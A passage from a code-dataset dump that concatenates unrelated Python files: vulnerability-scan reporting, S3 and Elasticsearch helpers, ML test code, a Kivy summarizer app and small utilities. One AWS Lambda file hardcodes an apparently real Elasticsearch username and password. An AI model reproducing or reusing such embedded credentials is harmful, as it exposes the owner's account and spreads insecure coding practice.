True,\n upload_registry_prefix: str=None,\n reference_group_ids=(),\n) -> typing.Sequence[typing.Tuple[AnalysisResult, int]]:\n executor = ThreadPoolExecutor(max_workers=parallel_jobs)\n protecode_api = protecode.client.from_cfg(protecode_cfg)\n protecode_api.set_maximum_concurrent_connections(parallel_jobs)\n protecode_util = ProtecodeUtil(\n protecode_api=protecode_api,\n processing_mode=processing_mode,\n group_id=protecode_group_id,\n upload_registry_prefix=upload_registry_prefix,\n reference_group_ids=reference_group_ids,\n )\n tasks = _create_tasks(\n product_descriptor,\n protecode_util,\n image_reference_filter\n )\n results = tuple(executor.map(lambda task: task(), tasks))\n\n relevant_results = filter_and_display_upload_results(\n upload_results=results,\n cve_threshold=cve_threshold,\n ignore_if_triaged=ignore_if_triaged,\n )\n\n _license_report = license_report(upload_results=results)\n\n return (relevant_results, _license_report)\n\n\ndef license_report(\n upload_results: typing.Sequence[UploadResult],\n) -> typing.Sequence[typing.Tuple[UploadResult, typing.Set[License]]]:\n for upload_result in upload_results:\n analysis_result = upload_result.result\n licenses = {\n component.license() for component in analysis_result.components()\n if component.license()\n }\n yield (upload_result, licenses)\n\n\ndef filter_and_display_upload_results(\n upload_results: typing.Sequence[UploadResult],\n cve_threshold=7,\n ignore_if_triaged=True,\n) -> typing.Sequence[typing.Tuple[AnalysisResult, int]]:\n # we only require the analysis_results for now\n results = [r.result for r in upload_results]\n\n results_without_components = []\n results_below_cve_thresh = []\n results_above_cve_thresh = []\n\n for result in results:\n components = result.components()\n if not components:\n results_without_components.append()\n continue\n\n greatest_cve = -1\n\n for component in components:\n vulnerabilities = filter(lambda v: not v.historical(), component.vulnerabilities())\n if ignore_if_triaged:\n vulnerabilities = filter(lambda v: not v.has_triage(), vulnerabilities)\n greatest_cve_candidate = highest_major_cve_severity(vulnerabilities)\n if greatest_cve_candidate > greatest_cve:\n greatest_cve = greatest_cve_candidate\n\n if greatest_cve >= cve_threshold:\n results_above_cve_thresh.append((result, greatest_cve))\n continue\n else:\n results_below_cve_thresh.append((result, greatest_cve))\n continue\n\n if results_without_components:\n warning(f'Protecode did not identify components for {len(results_without_components)}:\\n')\n for result in results_without_components:\n print(result.display_name())\n print('')\n\n def render_results_table(results: typing.Sequence[typing.Tuple[AnalysisResult, int]]):\n header = ('Component Name', 'Greatest CVE')\n results = sorted(results, key=lambda e: e[1])\n\n result = tabulate.tabulate(\n map(lambda r: (r[0].display_name(), r[1]), results),\n headers=header,\n tablefmt='fancy_grid',\n )\n print(result)\n\n if results_below_cve_thresh:\n info(f'The following components were below configured cve threshold {cve_threshold}')\n render_results_table(results=results_below_cve_thresh)\n print('')\n\n if results_above_cve_thresh:\n warning('The following components have critical vulnerabilities:')\n render_results_table(results=results_above_cve_thresh)\n\n return results_above_cve_thresh\n\n\ndef _create_task(protecode_util, container_image, component):\n def task_function():\n try:\n return protecode_util.upload_image(\n container_image=container_image,\n component=component,\n )\n except requests.exceptions.ConnectionError:\n error(\n 'A connection error occurred. This might be due problems with Protecode. '\n 'Please try executing the image scan job again.'\n )\n sys.exit(1)\n return task_function\n\n\ndef _create_tasks(product_model, protecode_util, image_reference_filter):\n for component in product_model.components():\n verbose('processing component: {c}:{v}'.format(c=component.name(), v=component.version()))\n component_dependencies = component.dependencies()\n for container_image in filter(\n image_reference_filter,\n component_dependencies.container_images()\n ):\n verbose('processing container image: {c}:{cir}'.format(\n c=component.name(),\n cir=container_image.image_reference(),\n )\n )\n yield _create_task(\n protecode_util=protecode_util,\n container_image=container_image,\n component=component,\n )\n","sub_path":"protecode/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"345254627","text":"#Takes json file of current settings\nimport sys\nimport json\nimport midas\n\n#Read the configuration file in \n#Access data as data[\"###\"] \nfilename = str(sys.argv[1]) \ndata = json.loads(open(filename).read())\n\n#Set up to access odb \nodb = midas.ODB('g2-field')\n\nfor i in range (1,101):\n bot_coil_str = \"/Equipment/Surface Coils/Settings/Set Points/Bottom Set Currents[\" + str(i-1) + \"]\"\n top_coil_str = \"/Equipment/Surface Coils/Settings/Set Points/Top Set Currents[\" + str(i-1) + \"]\"\n \n if i < 10:\n num = \"00\" + str(i)\n if 9 < i < 100:\n num = \"0\" + str(i)\n if i == 100:\n num = str(i)\n\n bot_str = \"B-\" + num\n top_str = \"T-\" + num\n \n odb.set_value(bot_coil_str, data[str(bot_str)])\n odb.set_value(top_coil_str, data[str(top_str)])\n","sub_path":"online/SurfaceCoilConfiguration/SetODBCurrents.py","file_name":"SetODBCurrents.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"364873039","text":"import os\nimport time\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport utils.constants as cs\nfrom sklearn import preprocessing\nfrom models.bi_lstm import Bi_LSTM\nfrom tensorflow.python.platform import gfile\nfrom utils import utility, os_utils, cv_utils\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef get_batch(video_path, all_frame):\n # batch_x = cv_utils.prepare_batch_frames(video_path, all_frame=all_frame)\n batch_x = utility.prepare_batch_frames_from_bg_data(video_path)\n return batch_x\n\n\ndef get_target_name(video_path):\n # print(video_path)\n split_path = video_path.split(cs.SLASH)\n # print(int(split_path[-1][0:3]))\n return int(split_path[-1][0:3])\n\n\ndef get_label_enocder(path_gen):\n list_of_target_names = []\n one_hot_list = []\n\n counter = 1\n for video_path in path_gen:\n # batch_x = get_batch(video_path, False)\n #\n # if batch_x is None:\n # continue\n\n list_of_target_names.append(get_target_name(video_path))\n one_hot_list.append(get_target_name(video_path))\n counter += 1\n\n # if counter == 10:\n # break\n label_encoder = preprocessing.LabelEncoder()\n label_encoder.fit(one_hot_list)\n transformed = label_encoder.transform(one_hot_list)\n return label_encoder, len(transformed)\n\n\ndef get_encoded_embeddings(logs_path):\n frozen_graph_filename = logs_path + cs.ENCODER1_FREEZED_PB_NAME\n\n with gfile.FastGFile(frozen_graph_filename, \"rb\") as f:\n graph_def = tf.GraphDef()\n byte = f.read()\n graph_def.ParseFromString(byte)\n\n # for node in graph_def.node:\n # print(node.name)\n tf.import_graph_def(graph_def, name='')\n\n detection_graph = tf.get_default_graph()\n x = detection_graph.get_tensor_by_name('inputs:0')\n encoded = detection_graph.get_tensor_by_name('encoder/encoded/LeakyRelu/Maximum:0')\n\n # embedding = sess.run(encoded, feed_dict={x: frame})\n # embedding = embedding.reshape((1, embedding.shape[0], embedding.shape[1]))\n\n return x, encoded\n\n\ndef get_encoded_embeddings(logs_path):\n frozen_graph_filename = logs_path + cs.ENCODER1_FREEZED_PB_NAME\n\n with gfile.FastGFile(frozen_graph_filename, \"rb\") as f:\n graph_def = tf.GraphDef()\n byte = f.read()\n graph_def.ParseFromString(byte)\n\n # for node in graph_def.node:\n # print(node.name)\n tf.import_graph_def(graph_def, name='')\n\n detection_graph = tf.get_default_graph()\n x = detection_graph.get_tensor_by_name('inputs:0')\n encoded = detection_graph.get_tensor_by_name('encoder/encoded/LeakyRelu/Maximum:0')\n\n # embedding = sess.run(encoded, feed_dict={x: frame})\n # embedding = embedding.reshape((1, embedding.shape[0], embedding.shape[1]))\n\n return x, encoded\n\n\ndef test():\n encoder_logs_path = cs.BASE_LOG_PATH + cs.MODEL_CONV_AE_1\n bi_lstm_logs_path = cs.BASE_LOG_PATH + cs.MODEL_BI_LSTM\n path_generator = os_utils.iterate_test_data(cs.BASE_DATA_PATH + cs.DATA_BG_TEST_VIDEO, \"mp4\")\n\n graph = tf.Graph()\n accuracy_1 = 0\n accuracy_3 = 0\n accuracy_5 = 0\n\n with graph.as_default():\n rnn = Bi_LSTM(lstm_size=128, batch_len=BATCH_SIZE, output_nodes=14, keep_prob=0.0, learning_rate=0.001)\n rnn.build_model()\n stage_1_ip, stage_2_ip = get_encoded_embeddings(encoder_logs_path)\n prediction = tf.nn.softmax(rnn.predictions)\n saver = tf.train.Saver()\n\n label_encoder, num_classes = get_label_enocder(path_generator)\n path_generator = os_utils.iterate_test_data(cs.BASE_DATA_PATH + cs.DATA_BG_TEST_VIDEO, \"mp4\")\n\n with tf.Session(graph=graph) as sess:\n saver.restore(sess, tf.train.latest_checkpoint(bi_lstm_logs_path))\n state_fw = sess.run(rnn.initial_state_fw)\n state_bw = sess.run(rnn.initial_state_bw)\n loop_count = 0\n for video_path in path_generator:\n # print(video_path)\n batch_x = get_batch(video_path, True)\n batch_y = get_target_name(video_path)\n\n encoded_batch = sess.run(stage_2_ip, feed_dict={stage_1_ip: batch_x})\n encoded_batch = encoded_batch.reshape((1, encoded_batch.shape[0], encoded_batch.shape[1]))\n\n feed = {rnn.inputs_: encoded_batch,\n rnn.targets_: label_encoder.transform([batch_y]),\n rnn.keep_prob: 0.5,\n rnn.initial_state_fw: state_fw,\n rnn.initial_state_bw: state_bw}\n\n probabilities_1, probabilities_3, probabilities_5 = sess.run([tf.nn.top_k(prediction, k=1),\n tf.nn.top_k(prediction, k=3),\n tf.nn.top_k(prediction, k=5)],\n feed_dict=feed)\n\n print(probabilities_1[1][0])\n print(probabilities_3[1][0])\n print(probabilities_5[1][0])\n print(batch_y - 1)\n\n if batch_y - 1 in probabilities_1[1][0]:\n accuracy_1 += 1\n print(\"accuracy_1 =\", accuracy_1)\n\n if batch_y - 1 in probabilities_3[1][0]:\n accuracy_3 += 1\n print(\"accuracy_3 =\", accuracy_3)\n\n if batch_y - 1 in probabilities_5[1][0]:\n accuracy_5 += 1\n print(\"accuracy_5 =\", accuracy_5)\n loop_count += 1\n\n print(\"==============================\", loop_count, \"=================================\")\n\n print(accuracy_1, 100 * accuracy_1 / 280)\n print(accuracy_3, 100 * accuracy_3 / 280)\n print(accuracy_5, 100 * accuracy_5 / 280)\n\n\nif __name__ == \"__main__\":\n total_start_time = time.time()\n BATCH_SIZE = 1\n test()\n total_end_time = time.time()\n print(\"===================================================\")\n print(\"Total Execution Time =\", total_end_time - total_start_time)\n print(\"===================================================\")\n\n # 1748.5977\n","sub_path":"core/test_bi_lstm.py","file_name":"test_bi_lstm.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"578320680","text":"class Wizard:\n def __init__(self, name, health, damage):\n self.name = name\n self.health = int(health)\n self.damage = int(damage)\n\n\ndef main():\n wizards = []\n data = input()\n while data != 'fight':\n wizard_names = list(map(lambda w: w.name, wizards))\n command, name, health, damage = data.split()\n if command == 'new':\n if name not in wizard_names:\n obj = Wizard(name, health, damage)\n wizards.append(obj)\n else:\n print(\"Wizard already exists!\")\n elif command == 'edit':\n if name not in wizard_names:\n print(\"Wizard does not exist!\")\n else:\n current_wizard = list(filter(lambda w: w.name == name, wizards))[0]\n current_wizard.health += int(health)\n current_wizard.damage += int(damage)\n\n data = input()\n\n battle(wizards)\n for wizard in sorted(wizards, key=lambda w: -w.health):\n print(f\"Wizard: {wizard.name}. Health: {wizard.health}. Damage power: {wizard.damage}\")\n\n\ndef battle(wizards):\n data = input()\n while data != 'end':\n w1, w2 = data.split(' <=> ')\n wizard_names = list(map(lambda w: w.name, wizards))\n if w1 in wizard_names and w2 in wizard_names:\n attacker = list(filter(lambda w: w.name == w1, wizards))[0]\n attacked = list(filter(lambda w: w.name == w2, wizards))[0]\n attacked.health -= int(attacker.damage)\n attacker.health += 50\n if attacked.health <= 0:\n print(f\"Fatality - {attacker.name} wins!\")\n wizards.remove(attacked)\n else:\n print(f\"Next time {attacked.name}!\")\n else:\n print(\"Cannot place a fight with non-existing wizards!\")\n data = input()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python/Python-Fundamentals/Exam/3.Wizards.py","file_name":"3.Wizards.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"532108798","text":"# -*- coding: utf-8 -*-\n\"\"\"\n smARt-cOAch (AROA): Stratification Tool (AROA-STRT)\n\n @description: Enables non-experts to build clusters of similar users and understand their evolution\n @author: Jon Kerexeta - Vicomtech Foundation, Basque Research and Technology Alliance (BRTA)\n @author: Andoni Beristain Iraola - Vicomtech Foundation, Basque Research and Technology Alliance (BRTA)\n @author: Roberto Álvarez Sánchez - Vicomtech Foundation, Basque Research and Technology Alliance (BRTA)\n @version: 0.1\n\"\"\"\n\n# Stdlib imports\n\n# Third-party app imports\n\n# Imports from your apps\n\n\ndef day_from_beginning(df, user, date):\n min_date = df[df['User ID'] == user]['datetime'].min()\n return (date - min_date).days\n\n\ndef define_color(val, max_=10, min_=-10, center_color_in_0='Progressive'):\n if center_color_in_0 == 'Progressive':\n middle_value = (max_ + min_)/2\n else:\n middle_value = 0\n if val >= middle_value:\n if val >= max_:\n return 'rgb(0, 255, 100)'\n else:\n val_extrapolated = int(255 * (max_ - val)/max_)\n return 'rgb({}, 255,100)'.format(val_extrapolated)\n else:\n if val <= min_:\n return 'rgb(255, 0, 100)'\n else:\n val_extrapolated = int(255 * (abs((min_ + val)/min_)))\n return 'rgb(255, {}, 100)'.format(val_extrapolated)\n","sub_path":"utils/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96297082","text":"import boto3\nimport requests\nimport json\nfrom requests_aws4auth import AWS4Auth\nfrom datetime import datetime\n\n\nbot = boto3.client('s3')\n#herere\n\ndef lambda_handler(event, context):\n print(event)\n record = event[\"Records\"][0]\n bucket = record['s3']['bucket']['name']\n name = record['s3']['object']['key']\n print(bucket)\n print(name)\n \n labels = getRekognitionLabel(bucket, name)\n print(labels)\n \n try:\n headerLabels = bot.head_object(Bucket=bucket, Key=name)\n print(\"headerLabels\", headerLabels)\n print(\"headerLabels\", headerLabels['Metadata'])\n customlabel = headerLabels['Metadata']['customlabels']\n customlabels = customlabel.split(\",\")\n for lab in customlabels:\n lab = lab.strip()\n labels.append(lab)\n labels.append(lab + 's')\n except:\n print(\"There is no custom label\")\n \n \n \n doc = parsePhoto(bucket, name, labels)\n print('doc is:')\n print(doc)\n reply = transToES(doc)\n print('reply from es is:')\n print(reply)\n\n return {\n 'statusCode' : 200,\n 'body' : json.dumps(\"indexed successfully\")\n }\n \n#\n# Function to generate the labels for current pic\n#\ndef getRekognitionLabel(bucket, name):\n boto = boto3.session.Session('','',region_name='us-east-1')\n reko = boto.client('rekognition')\n response = reko.detect_labels(\n Image = {\n 'S3Object' : {\n 'Bucket' : bucket,\n 'Name' : name\n }\n },\n MaxLabels=10\n )\n \n labels = []\n for res in response['Labels']:\n labels.append(res['Name'])\n labels.append(res['Name'] + 's')\n \n return labels\n\n#\n# Function to parse current pic's info as the format to be stored in Elasticsearch\n#\ndef parsePhoto(bucket, name, labels):\n doc = {\n 'objectKey' : name,\n 'bucket' : bucket,\n \"createdTimeStamp\" : datetime.now().strftime(\"%y-%m-%d %H:%M:%S\"),\n 'labels' : labels\n }\n return doc\n \n\n#\n# Function to connect ElasticSearch and upload photo info to it\n#\ndef transToES(doc):\n # Prepare the info for uploading\n host = 'https://search-photos-test-cpptiglxjbeoo2lxp4c2ybywke.us-east-1.es.amazonaws.com/photos/Photo'\n headers = { \"Content-Type\": \"application/json\" }\n response = requests.post(host, auth=(\"shihan\", \"Iamshihan1015@\"), json=doc, headers=headers)\n return response\n","sub_path":"index-photos/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409699046","text":"# Copyright (c) 2015-2016 Cisco Systems, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nimport fnmatch\nimport os\n\nimport sh\n\nfrom molecule import ansible_playbook\nfrom molecule import config\nfrom molecule import util\nfrom molecule.verifier import base\n\n\nclass Testinfra(base.Base):\n def __init__(self, molecule):\n super(Testinfra, self).__init__(molecule)\n self._testinfra_dir = molecule.config.config['molecule'][\n 'testinfra_dir']\n self._debug = molecule.args.get('debug')\n\n def execute(self):\n \"\"\"\n Executes linting/integration tests and returns None.\n\n Flake8 performs the code linting.\n Testinfra executes integration tests.\n\n :return: None\n \"\"\"\n ansible = ansible_playbook.AnsiblePlaybook(\n self._molecule.config.config['ansible'], {},\n _env=self._molecule.env)\n\n testinfra_options = config.merge_dicts(\n self._molecule.driver.testinfra_args,\n self._molecule.config.config['verifier']['options'])\n\n testinfra_options['ansible_env'] = ansible.env\n if self._molecule.args.get('debug'):\n testinfra_options['debug'] = True\n if self._molecule.args.get('sudo'):\n testinfra_options['sudo'] = True\n\n tests = self._get_tests()\n if len(tests) > 0:\n if 'flake8' not in self._molecule.disabled:\n self._flake8(tests)\n self._testinfra(tests, **testinfra_options)\n\n def _testinfra(self,\n tests,\n debug=False,\n ansible_env={},\n out=util.callback_info,\n err=util.callback_error,\n **kwargs):\n \"\"\"\n Executes testinfra against specified tests and returns a :func:`sh`\n response object.\n\n :param tests: A list of testinfra tests.\n :param debug: An optional bool to toggle debug output.\n :param pattern: A string containing the pattern of files to lint.\n :param ansible_env: An optional environment to pass to underlying\n :func:`sh` call.\n :param out: An optional function to process STDOUT for underlying\n :func:`sh` call.\n :param err: An optional function to process STDERR for underlying\n :func:`sh` call.\n :return: :func:`sh` response object.\n \"\"\"\n kwargs['debug'] = debug\n kwargs['_env'] = ansible_env\n kwargs['_out'] = out\n kwargs['_err'] = err\n\n msg = 'Executing testinfra tests found in {}/...'.format(\n self._testinfra_dir)\n util.print_info(msg)\n\n verbose = 'v'\n verbose_flag = str()\n for i in range(0, 3):\n if kwargs.get(verbose):\n verbose_flag = '-{}'.format(verbose)\n del kwargs[verbose]\n if kwargs.get('verbose'):\n del kwargs['verbose']\n break\n verbose = verbose + 'v'\n\n cmd = sh.testinfra.bake(tests)\n if verbose_flag:\n cmd = cmd.bake(verbose_flag)\n cmd = cmd.bake(**kwargs)\n\n return util.run_command(cmd, debug=self._debug)\n\n def _flake8(self, tests, out=util.callback_info, err=util.callback_error):\n \"\"\"\n Executes flake8 against specified tests and returns a :func:`sh`\n response object.\n\n :param tests: A list of testinfra tests.\n :param out: An optional function to process STDOUT for underlying\n :func:`sh` call.\n :param err: An optional function to process STDERR for underlying\n :func:`sh` call.\n :return: :func:`sh` response object.\n \"\"\"\n msg = 'Executing flake8 on *.py files found in {}/...'.format(\n self._testinfra_dir)\n util.print_info(msg)\n\n cmd = sh.flake8.bake(tests)\n return util.run_command(cmd, debug=self._debug)\n\n def _get_tests(self):\n return [\n filename\n for filename in self._walk(self._testinfra_dir, 'test_*.py')\n ]\n\n def _walk(self, directory, pattern):\n # Python 3.5 supports a recursive glob without needing os.walk.\n for root, dirs, files in os.walk(directory):\n for basename in files:\n if fnmatch.fnmatch(basename, pattern):\n filename = os.path.join(root, basename)\n\n yield filename\n","sub_path":"molecule/verifier/testinfra.py","file_name":"testinfra.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361596490","text":"# -*- coding: utf-8 -*-\nu\"\"\".\nAPI para interação com AWS-S3\n*****************************\nMauro Zackiewicz, Probabit, fev. 2017\n\"\"\"\nimport boto\n\n\nS3_ID = \"seu_id\"\nS3_KEY = \"sua_key\"\n\n\ndef salvar_s3(local, arquivo, filename):\n u\"\"\".\n Salva arquivo (tipo file)\n em um local [bucket] existente na S3\n com este nome (se já existe sobrescreve)\n \"\"\"\n s3 = boto.connect_s3(\n aws_access_key_id=S3_ID,\n aws_secret_access_key=S3_KEY\n )\n bucket = s3.get_bucket(local)\n key = bucket.new_key(filename)\n key.set_contents_from_file(arquivo)\n\n\ndef abrir_s3(local, filename):\n u\"\"\".\n Abre arquivo existente em s3\n e retorna o conteudo em forma de string\n => pronto para processar\n \"\"\"\n s3 = boto.connect_s3(\n aws_access_key_id=S3_ID,\n aws_secret_access_key=S3_KEY\n )\n bucket = s3.get_bucket(local)\n k = bucket.get_key(filename)\n return k.get_contents_as_string()\n\n\ndef lista_files_s3(local):\n u\"\"\".\n Retorna lista de arquivos existentes em um local\n \"\"\"\n s3 = boto.connect_s3(\n aws_access_key_id=S3_ID,\n aws_secret_access_key=S3_KEY\n )\n bucket = s3.get_bucket(local)\n return [key.name.encode('utf-8') for key in bucket.list()]\n\n\ndef arquivar_s3(local, filename, novo_local):\n u\"\"\".\n Move o file de local para novo_local\n bucket.copy_key(new_key_name, src_bucket_name, src_key_name,)\n \"\"\"\n s3 = boto.connect_s3(\n aws_access_key_id=S3_ID,\n aws_secret_access_key=S3_KEY\n )\n # copiar\n para = s3.get_bucket(novo_local)\n para.copy_key(filename, local, filename)\n # apagar\n de = s3.get_bucket(local)\n de.delete_key(filename)\n\n\ndef apagar_s3(local, filename):\n u\"\"\".\n Apaga o file de local\n \"\"\"\n s3 = boto.connect_s3(\n aws_access_key_id=S3_ID,\n aws_secret_access_key=S3_KEY\n )\n x = s3.get_bucket(local)\n x.delete_key(filename)\n","sub_path":"s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105597825","text":"import json\nimport os\nimport httplib2\nfrom . import config\n\nUSER_AGENT = 'Coconut/2.2.0 (Python)'\n\ndef submit(config_content, **kwargs):\n heywatch_url = os.getenv('COCONUT_URL', 'https://api.coconut.co')\n api_key = os.getenv('COCONUT_API_KEY')\n\n if 'api_key' in kwargs:\n api_key = kwargs['api_key']\n\n h = httplib2.Http()\n h.add_credentials(api_key, '')\n\n headers = {'User-Agent': USER_AGENT, 'Content-Type': 'text/plain', 'Accept': 'application/json'}\n\n response, content = h.request(heywatch_url + '/v1/job', 'POST', body=config_content, headers=headers)\n\n return json.loads(content.decode('utf-8'))\n\ndef create(**kwargs):\n return submit(config.new(**kwargs), **kwargs)\n","sub_path":"coconut/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"566597234","text":"import cv2\nimport numpy as np\n\nmser=cv2.MSER()\n#mser does significantly better on color than greyscale\nfast=cv2.FastFeatureDetector()\nsurf=cv2.SURF()\norb=cv2.ORB()\nsift=cv2.SIFT()\nbrisk=cv2.BRISK()\n\ncam = cv2.VideoCapture(0)\nret,frame = cam.read()\n#f1=cv2.medianBlur(frame,7)\n#f2=cv2.medianBlur(f1,7)\ndddd = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\nvis = disp = np.float32(dddd) \nwhile True:\n ret,frame = cam.read()\n dddd = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n #f1=cv2.medianBlur(frame,7)\n #f2=framecv2.medianBlur(f1,7)\n flag,f2 = cv2.threshold(dddd,100,120,cv2.THRESH_BINARY)\n #kp=mser.detect(f2,None)\n #hulls =[cv2.convexHull(p.reshape(-1,1,2)) for p in kp]\n\n #cv2.polylines(vis,hulls,1,(0,0,255))\n #kp=sift.detect(f2,None)\n #vis=cv2.drawKeypoints(f2,kp)\n cv2.accumulateWeighted(f2,vis,.9,None)\n runavg = cv2.convertScaleAbs(vis)\n disp=f2-vis\n cv2.imshow('features',disp)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n cam.release()\n cv2.destroyAllWindows()\n break\n","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153975077","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# From: https://oj.leetcode.com/problems/search-in-rotated-sorted-array/\n# Status: AC\n# Date: Sep. 25, 2014\n\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n def search(self, A, target):\n try:\n res = A.index(target)\n except:\n res = -1\n return res\n","sub_path":"week26/Yao/search_in_roated_aorted_array.py","file_name":"search_in_roated_aorted_array.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"402103562","text":"import json\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Split the instance segmentation annotations into a training and testing\r\n# set.\r\n\r\nwith open('../data/w_nebulizer_test_iter6.json', \"r\") as f:\r\n data = json.load(f)\r\n\r\n\r\nimages = data['images']\r\nannotations = data['annotations']\r\n\r\nSMALL = 32*32\r\nMEDIUM = 96*96\r\n# LARGE is above Medium here so not included\r\nsmall_count = 0\r\nmed_count = 0\r\nlarge_count = 0\r\n\r\nfor anno in annotations:\r\n a = anno[\"area\"]\r\n if a <= SMALL:\r\n small_count += 1\r\n elif SMALL < a < MEDIUM:\r\n med_count += 1\r\n else:\r\n large_count += 1\r\n\r\nprint(\"small count: \" + str(small_count))\r\nprint(\"med count: \" + str(med_count))\r\nprint(\"large count: \" + str(large_count))\r\n","sub_path":"helper_scripts/object-size-counter.py","file_name":"object-size-counter.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262882099","text":"import win32api\nimport win32con\nimport logging\nimport sys\n\nif __name__ == \"__main__\":\n hive_switcher = {\n 'HKCU': win32con.HKEY_CURRENT_USER,\n 'HKLM': win32con.HKEY_LOCAL_MACHINE,\n 'HKCR': win32con.HKEY_CLASSES_ROOT\n }\n\n hive_to_watch = hive_switcher[sys.argv[1]] if len(\n sys.argv) > 1 else win32con.HKEY_CURRENT_USER\n key_to_watch = sys.argv[2] if len(sys.argv) > 2 else 'Software'\n log_file_path = sys.argv[3] if len(sys.argv) > 3 else None\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=log_file_path\n )\n log = logging.getLogger()\n\n values = {(hive_to_watch, key_to_watch, 'DateTime'): (win32con.REG_DWORD, 1),\n (hive_to_watch, key_to_watch, 'Templates'): (win32con.REG_DWORD, 0),\n (hive_to_watch, key_to_watch, 'UnitConv'): (win32con.REG_DWORD, 0)}\n\n while True:\n for (hive, key, value_name), (value_type, value) in values.iteritems():\n handle_with_set_rights = win32api.RegOpenKeyEx(\n hive, key, 0, win32con.KEY_SET_VALUE)\n log.info(r'Setting %s\\%s\\%s = %s' % (hive, key, value_name, value))\n win32api.RegSetValueEx(\n handle_with_set_rights, value_name, 0, value_type, value)\n win32api.RegCloseKey(handle_with_set_rights)\n\n # Open and close the handle here as otherwise the set operation above\n # will trigger a further round\n handle_to_be_watched = win32api.RegOpenKeyEx(\n hive_to_watch, key_to_watch, 0, win32con.KEY_NOTIFY)\n win32api.RegNotifyChangeKeyValue(\n handle_to_be_watched, False, win32api.REG_NOTIFY_CHANGE_LAST_SET, None, False)\n win32api.RegCloseKey(handle_to_be_watched)\n","sub_path":"watch-reg.py","file_name":"watch-reg.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441933661","text":"from kivy.app import App\nfrom kivy.lang import Builder # used to work with builder and apply any design file\nfrom kivy.core.window import Window # used to change the color of the back ground\nfrom kivy.uix.screenmanager import ScreenManager, Screen # used to apply multiple screens\n\n\nfrom ReadDocument import ReadDocument\nfrom SummarizeFunction import Summarization\nfrom VideoCaptions.Video2Text import VideoCaptions\nfrom wordcounter.wordcounter import WordCounter\n\n\n# building different pages\nfrom webScraping import webScraping\n\nrunning_app = App.get_running_app()\n\n\nclass MainPage(Screen):\n pass\n\n\nmyText = \"\"\n\n\nclass TextPage(Screen):\n\n def __init__(self, text=\"\", type_id=None, **kwargs):\n super(TextPage, self).__init__(**kwargs)\n self.text = text\n self.type_id = type_id\n\n ##########################################################\n\n def Summarize(self):\n print(\"printed: \" + self.ids.userWrittenText.text)\n summarizer = Summarization()\n summarized_text = summarizer.Summarize(self.ids.userWrittenText.text, self.ids.slider.value)\n self.ids.summarized_label_id.text = summarized_text\n\n word_counter = WordCounter(self.ids.userWrittenText.text, delimiter=' ')\n doc_len = word_counter.get_word_count()\n\n word_counter = WordCounter(summarized_text, delimiter=' ')\n sum_len = word_counter.get_word_count()\n\n rate = str( round(sum_len/doc_len,3)*100 ) + '%'\n self.ids.compression_Ratio_Label_ID.text = rate\n\n print(\"done\")\n\n ##########################################################\n def compression_Rate_Picked(self, value):\n self.ids.compression_Ratio_Label_ID.text = value\n\n\nclass FilePage(Screen):\n\n def viewselecteFile(self, filePath):\n try:\n 